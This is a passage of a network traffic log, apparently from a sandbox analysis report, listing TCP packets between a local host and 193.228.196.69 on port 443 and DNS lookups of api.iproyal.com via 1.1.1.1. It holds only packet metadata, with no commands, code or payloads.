Apr 25, 2024 14:23:57.874355078 CEST	49813	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:57.874933004 CEST	49813	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:57.874943018 CEST	443	49813	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:58.290065050 CEST	443	49813	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:58.290280104 CEST	49813	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:58.290297985 CEST	443	49813	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:58.290687084 CEST	49813	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:58.290692091 CEST	443	49813	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:58.291728973 CEST	443	49813	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:58.291819096 CEST	49813	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:58.292814970 CEST	49813	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:58.292973042 CEST	49813	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:58.293078899 CEST	443	49813	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:58.293142080 CEST	49813	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:59.398955107 CEST	49814	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:59.399024963 CEST	443	49814	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:59.399168015 CEST	49814	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:59.401794910 CEST	49814	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:59.401827097 CEST	443	49814	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:59.821803093 CEST	443	49814	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:59.822103977 CEST	49814	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:59.822151899 CEST	443	49814	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:59.822362900 CEST	49814	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:59.822375059 CEST	443	49814	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:59.826001883 CEST	443	49814	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:59.826148987 CEST	49814	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:59.826679945 CEST	49814	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:59.826680899 CEST	49814	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:59.827073097 CEST	443	49814	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:59.827291965 CEST	49814	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:00.999933004 CEST	49815	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:00.999968052 CEST	443	49815	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:01.000046015 CEST	49815	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:01.000458002 CEST	49815	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:01.000473022 CEST	443	49815	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:01.423867941 CEST	443	49815	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:01.427953959 CEST	49815	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:01.427968025 CEST	443	49815	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:01.428006887 CEST	49815	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:01.428020954 CEST	443	49815	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:01.431559086 CEST	443	49815	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:01.431798935 CEST	49815	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:01.432137966 CEST	49815	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:01.432507992 CEST	443	49815	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:01.432609081 CEST	49815	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:01.432617903 CEST	443	49815	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:01.432657003 CEST	49815	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:02.516340017 CEST	49816	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:02.516402960 CEST	443	49816	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:02.516469955 CEST	49816	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:02.539911032 CEST	49816	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:02.539951086 CEST	443	49816	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:02.962096930 CEST	443	49816	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:02.962258101 CEST	49816	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:02.962271929 CEST	443	49816	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:02.962415934 CEST	49816	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:02.962421894 CEST	443	49816	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:02.963452101 CEST	443	49816	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:02.963506937 CEST	49816	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:02.963948965 CEST	49816	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:02.964042902 CEST	49816	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:02.964076996 CEST	443	49816	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:02.964134932 CEST	49816	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:03.944171906 CEST	49817	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:03.944225073 CEST	443	49817	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:03.945077896 CEST	49817	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:03.945667982 CEST	49817	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:03.945681095 CEST	443	49817	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:04.361991882 CEST	443	49817	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:04.364881992 CEST	49817	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:04.364912033 CEST	443	49817	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:04.365109921 CEST	49817	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:04.365118027 CEST	443	49817	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:04.366607904 CEST	443	49817	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:04.366674900 CEST	49817	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:04.367548943 CEST	49817	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:04.367755890 CEST	443	49817	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:04.367769957 CEST	49817	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:04.367782116 CEST	443	49817	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:04.367798090 CEST	49817	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:05.543786049 CEST	49818	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:05.543833017 CEST	443	49818	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:05.544121027 CEST	49818	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:05.544780016 CEST	49818	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:05.544797897 CEST	443	49818	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:05.962651968 CEST	443	49818	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:05.962884903 CEST	49818	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:05.962943077 CEST	443	49818	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:05.962997913 CEST	49818	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:05.963010073 CEST	443	49818	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:05.966574907 CEST	443	49818	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:05.966686964 CEST	49818	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:05.967331886 CEST	49818	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:05.967333078 CEST	49818	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:05.967690945 CEST	443	49818	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:05.967899084 CEST	49818	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:07.097126007 CEST	49819	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:07.097145081 CEST	443	49819	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:07.097203970 CEST	49819	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:07.098695040 CEST	49819	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:07.098711014 CEST	443	49819	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:07.520997047 CEST	443	49819	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:07.523891926 CEST	49819	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:07.523909092 CEST	443	49819	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:07.524138927 CEST	49819	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:07.524146080 CEST	443	49819	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:07.525837898 CEST	443	49819	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:07.525998116 CEST	49819	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:07.526475906 CEST	49819	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:07.526475906 CEST	49819	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:07.526740074 CEST	443	49819	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:07.527489901 CEST	49819	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:08.456408024 CEST	49820	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:08.456500053 CEST	443	49820	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:08.456625938 CEST	49820	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:08.457403898 CEST	49820	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:08.457437992 CEST	443	49820	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:08.872349024 CEST	443	49820	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:08.873974085 CEST	49820	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:08.873999119 CEST	443	49820	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:08.874058008 CEST	49820	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:08.874062061 CEST	443	49820	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:08.876713991 CEST	443	49820	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:08.876782894 CEST	49820	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:08.879194975 CEST	49820	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:08.879286051 CEST	49820	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:08.879462957 CEST	443	49820	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:08.879517078 CEST	49820	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:09.920289040 CEST	49821	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:09.920329094 CEST	443	49821	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:09.920437098 CEST	49821	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:09.924364090 CEST	49821	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:09.924376011 CEST	443	49821	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:10.340487003 CEST	443	49821	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:10.340893984 CEST	49821	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:10.340915918 CEST	443	49821	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:10.340976954 CEST	49821	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:10.340982914 CEST	443	49821	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:10.342432022 CEST	443	49821	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:10.342504025 CEST	49821	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:10.342963934 CEST	49821	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:10.343127012 CEST	443	49821	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:10.343168020 CEST	49821	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:10.343173981 CEST	443	49821	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:10.343192101 CEST	49821	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:11.552479029 CEST	49822	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:11.552512884 CEST	443	49822	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:11.554995060 CEST	49822	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:11.557823896 CEST	49822	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:11.557838917 CEST	443	49822	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:11.972839117 CEST	443	49822	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:11.973457098 CEST	49822	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:11.973457098 CEST	49822	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:11.973468065 CEST	443	49822	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:11.973480940 CEST	443	49822	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:11.974932909 CEST	443	49822	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:11.975243092 CEST	49822	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:11.975619078 CEST	49822	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:11.975619078 CEST	49822	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:11.975784063 CEST	443	49822	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:11.979001045 CEST	49822	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:13.130924940 CEST	49823	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:13.130976915 CEST	443	49823	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:13.131036043 CEST	49823	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:13.132055998 CEST	49823	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:13.132065058 CEST	443	49823	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:13.549912930 CEST	443	49823	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:13.550117970 CEST	49823	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:13.550139904 CEST	443	49823	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:13.550406933 CEST	49823	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:13.550415993 CEST	443	49823	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:13.554003000 CEST	443	49823	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:13.554207087 CEST	49823	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:13.554692030 CEST	49823	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:13.554737091 CEST	49823	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:13.555057049 CEST	443	49823	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:13.555517912 CEST	49823	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:14.728775024 CEST	49824	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:14.728816986 CEST	443	49824	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:14.728882074 CEST	49824	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:14.729741096 CEST	49824	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:14.729754925 CEST	443	49824	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:15.145754099 CEST	443	49824	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:15.145900965 CEST	49824	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:15.145919085 CEST	443	49824	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:15.146083117 CEST	49824	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:15.146087885 CEST	443	49824	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:15.149650097 CEST	443	49824	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:15.149714947 CEST	49824	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:15.150600910 CEST	49824	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:15.150688887 CEST	49824	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:15.150971889 CEST	443	49824	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:15.151038885 CEST	49824	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:16.013794899 CEST	49825	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:16.013827085 CEST	443	49825	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:16.014682055 CEST	49825	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:16.015305996 CEST	49825	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:16.015316963 CEST	443	49825	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:16.434376955 CEST	443	49825	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:16.434645891 CEST	49825	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:16.434664965 CEST	443	49825	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:16.434745073 CEST	49825	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:16.434750080 CEST	443	49825	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:16.438447952 CEST	443	49825	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:16.438529015 CEST	49825	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:16.439464092 CEST	49825	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:16.439464092 CEST	49825	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:16.439862967 CEST	443	49825	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:16.439941883 CEST	49825	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:17.932307005 CEST	49826	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:17.932395935 CEST	443	49826	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:17.935838938 CEST	49826	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:17.936615944 CEST	49826	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:17.936650038 CEST	443	49826	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:18.352736950 CEST	443	49826	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:18.352963924 CEST	49826	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:18.353014946 CEST	443	49826	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:18.353066921 CEST	49826	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:18.353080988 CEST	443	49826	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:18.356693983 CEST	443	49826	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:18.356770039 CEST	49826	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:18.357461929 CEST	49826	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:18.357568979 CEST	49826	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:18.357814074 CEST	443	49826	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:18.357877016 CEST	49826	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:19.646852970 CEST	49827	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:19.646876097 CEST	443	49827	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:19.647310019 CEST	49827	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:19.651792049 CEST	49827	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:19.651803017 CEST	443	49827	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:20.076406956 CEST	443	49827	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:20.108122110 CEST	49827	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:20.108122110 CEST	49827	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:20.108131886 CEST	443	49827	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:20.108144045 CEST	443	49827	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:20.109611988 CEST	443	49827	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:20.110156059 CEST	49827	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:20.120363951 CEST	49827	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:20.120496035 CEST	49827	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:20.120554924 CEST	443	49827	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:20.123886108 CEST	49827	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:21.195821047 CEST	49828	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:21.195867062 CEST	443	49828	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:21.195928097 CEST	49828	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:21.196856976 CEST	49828	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:21.196872950 CEST	443	49828	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:21.618628979 CEST	443	49828	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:21.618801117 CEST	49828	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:21.618819952 CEST	443	49828	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:21.618891001 CEST	49828	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:21.618896008 CEST	443	49828	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:21.619894981 CEST	443	49828	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:21.619997025 CEST	49828	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:21.620534897 CEST	49828	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:21.620647907 CEST	443	49828	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:21.620659113 CEST	49828	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:21.620666027 CEST	443	49828	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:21.620742083 CEST	49828	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:22.558749914 CEST	49829	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:22.558783054 CEST	443	49829	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:22.558850050 CEST	49829	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:22.560323954 CEST	49829	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:22.560338974 CEST	443	49829	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:22.976439953 CEST	443	49829	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:22.976593018 CEST	49829	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:22.976608038 CEST	443	49829	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:22.976758003 CEST	49829	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:22.976763964 CEST	443	49829	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:22.980423927 CEST	443	49829	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:22.980489016 CEST	49829	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:22.981235981 CEST	49829	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:22.981322050 CEST	49829	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:22.981681108 CEST	443	49829	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:22.981729031 CEST	49829	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:23.970233917 CEST	49830	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:23.970263958 CEST	443	49830	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:23.970362902 CEST	49830	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:23.971292019 CEST	49830	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:23.971303940 CEST	443	49830	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:24.387355089 CEST	443	49830	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:24.387532949 CEST	49830	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:24.387557030 CEST	443	49830	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:24.387613058 CEST	49830	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:24.387618065 CEST	443	49830	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:24.391151905 CEST	443	49830	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:24.391223907 CEST	49830	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:24.391752958 CEST	49830	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:24.391844988 CEST	49830	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:24:24.392071962 CEST	443	49830	193.228.196.69	192.168.2.7
Apr 25, 2024 14:24:24.392144918 CEST	49830	443	192.168.2.7	193.228.196.69

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 14:21:13.584639072 CEST	54301	53	192.168.2.7	1.1.1.1
Apr 25, 2024 14:21:13.696003914 CEST	53	54301	1.1.1.1	192.168.2.7
Apr 25, 2024 14:22:14.033436060 CEST	60108	53	192.168.2.7	1.1.1.1
Apr 25, 2024 14:22:14.144052029 CEST	53	60108	1.1.1.1	192.168.2.7
Apr 25, 2024 14:22:41.008613110 CEST	51093	53	192.168.2.7	1.1.1.1
Apr 25, 2024 14:22:41.119813919 CEST	53	51093	1.1.1.1	192.168.2.7
Apr 25, 2024 14:23:04.894032955 CEST	53063	53	192.168.2.7	1.1.1.1
Apr 25, 2024 14:23:05.004666090 CEST	53	53063	1.1.1.1	192.168.2.7
Apr 25, 2024 14:23:42.277168989 CEST	59612	53	192.168.2.7	1.1.1.1
Apr 25, 2024 14:23:42.387455940 CEST	53	59612	1.1.1.1	192.168.2.7
Apr 25, 2024 14:24:25.505857944 CEST	55243	53	192.168.2.7	1.1.1.1
Apr 25, 2024 14:24:25.618228912 CEST	53	55243	1.1.1.1	192.168.2.7
Apr 25, 2024 14:24:44.247507095 CEST	63859	53	192.168.2.7	1.1.1.1
Apr 25, 2024 14:24:44.358824968 CEST	53	63859	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2024 14:21:13.584639072 CEST	192.168.2.7	1.1.1.1	0xd507	Standard query (0)	api.iproyal.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:22:14.033436060 CEST	192.168.2.7	1.1.1.1	0xc7ba	Standard query (0)	api.iproyal.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:22:41.008613110 CEST	192.168.2.7	1.1.1.1	0xa2f8	Standard query (0)	api.iproyal.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:23:04.894032955 CEST	192.168.2.7	1.1.1.1	0xeebb	Standard query (0)	api.iproyal.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:23:42.277168989 CEST	192.168.2.7	1.1.1.1	0x445f	Standard query (0)	api.iproyal.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:24:25.505857944 CEST	192.168.2.7	1.1.1.1	0x96b0	Standard query (0)	api.iproyal.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:24:44.247507095 CEST	192.168.2.7	1.1.1.1	0xa229	Standard query (0)	api.iproyal.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 25, 2024 14:21:13.696003914 CEST	1.1.1.1	192.168.2.7	0xd507	No error (0)	api.iproyal.com	193.228.196.69	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:21:13.696003914 CEST	1.1.1.1	192.168.2.7	0xd507	No error (0)	api.iproyal.com	93.189.62.83	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:22:14.144052029 CEST	1.1.1.1	192.168.2.7	0xc7ba	No error (0)	api.iproyal.com	193.228.196.69	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:22:14.144052029 CEST	1.1.1.1	192.168.2.7	0xc7ba	No error (0)	api.iproyal.com	93.189.62.83	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:22:41.119813919 CEST	1.1.1.1	192.168.2.7	0xa2f8	No error (0)	api.iproyal.com	193.228.196.69	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:22:41.119813919 CEST	1.1.1.1	192.168.2.7	0xa2f8	No error (0)	api.iproyal.com	93.189.62.83	A (IP address)	IN (0x0001)	false
